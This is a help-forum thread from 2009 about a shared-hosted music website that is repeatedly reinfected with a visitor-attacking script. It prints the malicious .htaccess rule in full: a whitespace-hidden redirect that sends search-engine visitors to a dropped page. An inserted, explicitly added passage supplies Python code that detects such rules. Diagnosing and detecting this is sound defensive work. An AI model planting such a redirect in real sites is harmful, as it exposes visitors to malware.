Solved

Website infected with virus - keeps coming back

Posted on 2009-02-09
Last Modified: 2013-11-22
Hi,

A contact needs some assistance with a website. It just keeps getting infected with a virus.
The website is:


www.philcampbellmusic.co.uk

(WARNING: virus on the above website at the time of writing, which will be brought down in the next few hours and reset - make sure you have anti-virus software on your PC before clicking the link above)

Whenever we clean it up they soon seem to reinfect it with a virus again. We even took down the administration for the CMS that allowed us to edit the content and of course tried changing various passwords.

The website is hosted by fasthosts (linux package - mysql db). Is there some weakness in their system which could be making this worse / easier for the culprits to gain access?

Thanks
Question by:afflik1923

Assisted Solution

by:fosiul01
fosiul01 earned 800 total points
ID: 23590536
Hi,
if the website is hosted on Linux, then I would not say for sure that it's been affected by a virus.

It could be that someone uploaded a script to the server via your CMS, or your server has been compromised.

Can you just explain what makes you think it's been affected by a virus?

Did anyone tell you?

Also, is this shared hosting or VPS hosting?

Author Comment

by:afflik1923
ID: 23590765
If you visit the website running anti-virus software and Internet Explorer (say, try it with AVG) then you will see what occurs. In fact I have attached a screenshot.

Also if you google Phil Campbell and then click the first result, you are actually redirected to another website.

I can fix it in the short term, but how can I stop this from re-occurring?


ExampleCapture.JPG

Assisted Solution

by:fosiul01
fosiul01 earned 800 total points
ID: 23591004
Ok, from my PC I am getting Troj/JSRedir-D for a script called .js

If you look at the picture you will see
it's flagging /admin/images/check.js as a virus

It's treating the JS script as a virus.

Like on one of my websites, I had a simple JavaScript, and those antivirus programs would not allow viewing that page because of the JavaScript.


Cleaning the virus on the PC would not make any difference, and also, there is no virus on the server; it's the script you need to check, there is something in the script that is not allowed by the antivirus.

virusscript.GIF

Author Comment

by:afflik1923
ID: 23591157
It is a script virus, but that's the problem. It actually tries to compromise visitors' PCs. Fasthosts even closed us down for not sorting it out for a period of time.
Also the problem at present does not occur in Firefox, only IE, and the Flash does not play properly.


Assisted Solution

by:fosiul01
fosiul01 earned 800 total points
ID: 23591178
It's the CMS you are using; I would say it's bugs in that CMS.

Do you have any check.js file in /admin/imagesehi/check.js?

Expert Comment

by:xmachine
ID: 23591493
Hi,

Can you rename both files and upload them here please?



A Symantec Certified Specialist @ your service

Author Comment

by:afflik1923
ID: 23595274
I will upload them ASAP. They are always the files that get changed and they are full of someone else's code.

Unfortunately the original creators of the website have washed their hands of the website a bit, which is frustrating.

Thanks.

Author Comment

by:afflik1923
ID: 23596660
I'm struggling to upload the two infected files right now. But please find the contents of the .htaccess file (in code box).
It uses a lot of empty space, so when you first open it, it looks like an empty file.

Also I have now written instructions on how I fix the problem. But it is always not long before it comes back. The guide is:

1) Delete the ehi folder in
/htdocs/admin/images/

2) Replace the two files
flashEmbed.js
pageSwitch.js
with non-infected versions.

3) Open the .htaccess file in the root folder for editing and delete all of its content.

If I run these three steps the website is back to normal. But how do I find and close whatever hole is letting whoever in?




# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER}  [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /admin/images/ehi/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c


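The three-step cleanup above removes the symptoms each time; what the thread lacks is a way to notice the same infection shape coming back before a visitor's anti-virus does. The following Python check is an added example (not code from the thread or from Fasthosts): it flags RewriteRules in .htaccess that are guarded by a referer test naming search engines (the cloaking pattern posted above), measures the whitespace padding that made the file look empty, and compares the two repeatedly overwritten JS files against SHA-256 hashes of clean copies. The sample .htaccess text and baseline hashes are constructed for illustration; a real run would feed it the file contents read from the web root.

```python
import hashlib

# Search engines named in the posted RewriteCond; a referer test against this
# list is the fingerprint of a redirect shown only to search-engine visitors.
SEARCH_ENGINES = ("google", "msn", "yahoo", "live", "ask", "yandex")

def suspicious_htaccess_rules(text):
    """Return (referer_condition, target) for every RewriteRule guarded by a
    RewriteCond on HTTP_REFERER that names a search engine."""
    findings, pending = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                         # skip padding and comment lines
        if line.startswith("RewriteCond"):
            pending.append(line)
        elif line.startswith("RewriteRule"):
            guards = [c for c in pending if "HTTP_REFERER" in c
                      and any(e in c.lower() for e in SEARCH_ENGINES)]
            parts = line.split()
            if guards and len(parts) > 2:
                findings.append((guards[0], parts[2]))
            pending = []                     # conditions bind to one rule only
    return findings

def padding_ratio(text):
    """Share of whitespace; the posted file was nearly all spaces, so a
    near-1.0 ratio on a non-empty .htaccess is itself a warning sign."""
    return sum(c.isspace() for c in text) / len(text) if text else 0.0

def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()

def changed_files(baseline, contents):
    """baseline: {relative_path: sha256 of the clean copy}; contents:
    {relative_path: bytes, or None if missing}. Returns the paths that differ."""
    return [rel for rel, known in baseline.items()
            if contents.get(rel) is None or sha256_hex(contents[rel]) != known]

# Constructed sample modelled on the posted file: whitespace padding followed by
# the referer-conditional redirect into the dropped ehi/ folder.
SAMPLE_HTACCESS = (" " * 120 + "\n") * 3 + """
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\\-]+\\.)*(google|msn|yahoo)\\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|search)\\=
RewriteRule ^.*$ /admin/images/ehi/ex3/t.htm [L]
"""
```

Run from a cron job against a copy of the web root, a non-empty result from any of the three functions is the signal to re-run the cleanup and to look at the CMS upload path and the FTP/CMS credentials, which is where the thread's advice points.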

Author Comment

by:afflik1923
ID: 23649524
So any ideas on this? At present the virus is not present as I cleaned it up again, but I know sooner or later it will rear its head again. It would be nice to close whatever hole is open.

Thanks

Assisted Solution

by:xmachine
xmachine earned 1000 total points
ID: 23649888

Assisted Solution

by:xmachine
xmachine earned 1000 total points
ID: 23649911
Additional Countermeasures:

Please check the following articles for additional countermeasures:

http://25yearsofprogramming.com/blog/20071223.htm

http://25yearsofprogramming.com/blog/20070705.htm

http://thedesignspace.net/MT2archives/000505.html

Check your website for any infected pages:

http://www.unmaskparasites.com/


To secure your website(s), it's recommended to install Apache Mod_security:

http://www.modsecurity.org/projects/modsecurity/apache/index.html

http://www.onlamp.com/pub/a/apache/2003/11/26/mod_security.html

http://www.howtoforge.com/apache_mod_security

http://www.linuxjournal.com/article/8708


A Symantec Certified Specialist @ your service

Author Comment

by:afflik1923
ID: 23649977
I will check out some of these links, but also add that don't forget I'm using a shared host, so I doubt I would be able to make changes to the Apache installation?
Do you think the webhost themselves (Fasthost) play some part in the weak security?

Assisted Solution

by:xmachine
xmachine earned 1000 total points
ID: 23650103
Hi,

Yes, you should ask them how to add/enable mod_security for Apache. Otherwise, change the hosting provider. If they can't protect you, it's time for an upgrade.

Check the following providers + guides:

http://litespeedtech.com/solutions/webhosting/

http://blog.eukhost.com/webhosting/how-to-install-mod_security-for-apache/

http://www.sharkspace.com/helpcenter/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=88&nav=0,22


A Symantec Certified Specialist @ your service

Accepted Solution

by:
afflik1923 earned 0 total points
ID: 23794398
Still ok since fixing the last attack, but I'm sure an attack is imminent. I will close this tad for now however.

Thanks

Author Comment

by:afflik1923
ID: 23794441
Note: I thought I had already awarded points for this question, but if this has not happened let me know. I believe I have awarded points and accepted my own summary answer.

Thanks